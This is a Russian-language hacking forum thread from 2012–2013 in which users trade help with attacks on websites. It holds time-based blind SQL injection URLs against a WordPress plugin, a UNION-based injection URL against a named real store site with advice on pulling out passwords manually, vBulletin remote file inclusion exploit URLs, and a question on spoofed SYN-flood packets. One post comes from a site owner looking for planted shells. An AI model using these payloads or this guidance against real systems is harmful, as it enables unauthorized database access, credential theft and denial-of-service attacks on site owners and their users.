 |
|

09.12.2012, 16:10
|
|
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами:
7552406
Репутация:
724
|
|
Сообщение от Pinkie
чем отправлять post запрос на сайт чужой?
Burp Suite, HTTP Analyze -> build request
|
|
|

09.12.2012, 17:18
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от blesse
Сабж:Пытаюсь провести на уязвимом плагине wp SQL инъекцию,
Плагин на exploit-db
Poc:
http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,10 9,97,112))),0)--%20
Я запрашиваю:
1)
http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(100000,BENCHMARK(100000,md5(ble sse()))),0)--%20
2)
http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,sleep(30),0)--%20
Какой либо задержки в обоих случаях не последовало.
Плагин на котором экспериментирую скачал от туда же(эксплоит помечен как верифицированный)mq=off. Значит где то я синтаксис нарушил?Или в чем может быть трабла?
сайт в пм вышли, я тут синтаксис напишу нужный
|
|
|

12.12.2012, 13:36
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от grimnir
Привет! Через havij получаю доступ к базе http://store.vampirefreaks.com/?cat_id=11 но не могу вытянуть пароли ,просто ??? http://imageshack.us/photo/my-images/10/utennavnxd.png/
можно как-то вытянуть пароли?
Вывод можно добиться вот так
_ttp://store.vampirefreaks.com/?cat_id=-11'+union+select+1,2,@@version,4,5+and+1='2
Забудь про havij - он не более чем дампер. Выведешь руками - потом сдампишь.
А вообще тема для подобных вопросов тут
|
|
|

12.12.2012, 18:13
|
|
Участник форума
Регистрация: 18.01.2012
Сообщений: 162
С нами:
7535126
Репутация:
1
|
|
Сообщение от BigBear
сайт в пм вышли, я тут синтаксис напишу нужный
Ну что не осилил?
|
|
|

12.12.2012, 18:17
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от blesse
Ну что не осилил?
Продублируй в ПМ. Походу удалил случайно пока почту чистил.
|
|
|

18.01.2013, 12:17
|
|
Новичок
Регистрация: 08.04.2009
Сообщений: 26
С нами:
8996208
Репутация:
1
|
|
Мужики, кто знаком с Textpattern 4.0.5, подскажите в каком файле лежит шаблон. Доступа в админку нет, а через шелл не удается найти шаблон, уже все перерыл.
|
|
|

29.01.2013, 14:19
|
|
Новичок
Регистрация: 09.10.2012
Сообщений: 0
С нами:
7153526
Репутация:
0
|
|
Syn flood
Подскажите пожалуйста с таким вопросом: Syn flood, собираю пакет с случайным ip, если отправляю пакет с той же подсети что и сервер, тогда на сервере создается очередь полуоткрытых соединений, если же подсеть другая (внешний канал) тогда пакеты не доставляются. Чексумма правильная. Совсем не знаю в чем ошибка.
|
|
|

29.01.2013, 18:48
|
|
Новичок
Регистрация: 03.08.2011
Сообщений: 0
С нами:
7777046
Репутация:
0
|
|
Угнали ФТП,- нужно проверить на шеллы
Здравствуйте форумчане, такая ситуация:
вирус поймал, угнал мои фтп пароли, повшивали редиректов и .htaccess и ифреймов в шаблоны.
Я все сделал - обезопасил доступ, но нужна помощь в проверке на шелы итд. - хостинг ukraine ком юа.
буду рад любой информации или предложениям!
|
|
|

01.02.2013, 09:51
|
|
Новичок
Регистрация: 31.01.2013
Сообщений: 2
С нами:
6989366
Репутация:
0
|
|
Какой алгоритм генерации хэшей паролей использует ebiz cms?
|
|
|

10.02.2013, 01:17
|
|
Познающий
Регистрация: 02.10.2012
Сообщений: 31
С нами:
7163606
Репутация:
0
|
|
Мужики, подскажите насчет vbulletin 4.0.2 Remote File Inclusion
Кто-то пробовал? Все облазил-нашел только следующее
# Exploit :
#
# http://www.site.com/path/includes/class_block.php?classfile=[shell code]
#
# http://www.site.com/path/vb/vb.php?filename=[shell code]
#
# http://www.site.com/path/packages/vbattach/attach.php?include_file=[shell code]
Но не прокатывает на ни на цели, ни на локалке. Что я делаю не так? Или это фейк???
Если не сюда пишу-посоветуйте раздел, где спросить можно.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|